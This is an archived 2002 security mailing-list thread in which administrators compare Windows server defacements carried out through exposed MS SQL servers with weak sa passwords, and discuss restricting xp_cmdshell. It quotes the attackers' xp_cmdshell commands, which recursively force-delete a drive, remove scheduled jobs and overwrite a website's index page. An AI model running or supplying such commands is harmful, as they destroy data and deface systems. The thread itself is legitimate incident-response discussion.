Security Incidents mailing list archives
Re: Windows Systems Defaced
From: Alphonse MacDonald <amacdonald () islandpress org>
Date: 14 May 2002 20:44:18 -0000
In-Reply-To: <BKEPKKMHGCKPBIKCIBGNGEPJCAAA.zenone () cats ucsc edu> Island Press was similarly defaced, it appears access occured at 5:08 on May 8th and was achieved via the MS SQL server sa password. We did not have IIS running but had enough files removed to require a complete rebuild. We also believed all systems to have been properly patched. Were any of the other servers attacked behind a firewall or were they all visible? Alphonse
From: "Steve Zenone" <zenone () cats ucsc edu> To: <incidents () securityfocus com> Cc: <thompson () isc upenn edu> Subject: RE: Windows Systems Defaced Date: Thu, 2 May 2002 20:23:56 -0700Hello,Stephen W. Thompson wrote: |> Have any of you seen similar activity? Any thoughts? | |Yes, we had one that matches most of your details. These |are exact matches: | |> [] Damage occurred around 1600 on 5/1/2002 |BUT=3D> (approx. 16:00 EDT for us) |> [] Win-popup message with "F---ing University of
Rochester"
|> -- NOTE: not all systems running IIS |> [] Admins claimed that all systems were patched
correctly
|> [] Most were running updated and current AV Thank you very much for your reply - it definitely helps! We have been seeing MS-SQL (1433/tcp) attacks that try
and execute=20
the following:=20 -----BEGIN SNIPPET----- xp_cmdshell 'echo net send localhost F---ing
University of Rochester =
rebooting... > rochester.bat' xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >>
rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >>
rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >>
rochester.bat'
xp_cmdshell 'at /delete /y' xp_cmdshell 'echo if exist \inetpub\wwwroot\ type=20 %systemroot%\rochester.html ^
e:\inetpub\wwwroot\index.html >>=20
rochester.bat' -----END SNIPPET----- The above commands were directed to systems that were
listening on
port 1433/tcp and accessible from the outside. It appears
that there
were multiple source IPs involved in this attack. At this time, I am not completely clear on how to protect
from this
attack. What I've researched is that since external
functions such=20
as xp_cmdshell, xp_startmail, xp_sendmail, and
xp_stopmail present=20
possible security risks, it is recommended to drop such
external=20
system functions. Else, deny EXECUTE permission on them
to specific=20
users/roles if dropping these procedures would break any
of the SQL=20
Server. I haven't tested this - but does anyone on this
list know if
this is a safe and effective solution? Regards, Steve ----------------------------------------------------------
------------------
This list is provided by the SecurityFocus ARIS analyzer
service.
For more information on this free incident handling,
management
and tracking system please see:
http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Windows Systems Defaced Steve Zenone (May 02)
- <Possible follow-ups>
- Re: Windows Systems Defaced Stephen W. Thompson (May 02)
- RE: Windows Systems Defaced Steve Zenone (May 02)
- RE: Windows Systems Defaced H C (May 03)
- RE: Windows Systems Defaced Brenna Primrose (May 03)
- RE: Windows Systems Defaced Johannes B. Ullrich (May 03)
- Windows Systems Defaced/destroyed, plus Port 3389 attacks Bukys, Liudvikas (May 13)
- RE: Windows Systems Defaced Steve Zenone (May 02)